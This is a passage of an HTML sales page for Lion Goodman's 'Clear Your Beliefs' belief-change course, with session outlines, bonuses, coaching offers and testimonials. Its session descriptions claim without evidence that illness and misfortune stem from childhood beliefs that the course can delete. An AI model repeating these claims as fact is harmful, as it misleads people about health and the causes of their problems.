rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>”\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior.\n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank">Free eBook</a>\n\n&nbsp;\n\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<strong>– G. J., software developer</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and 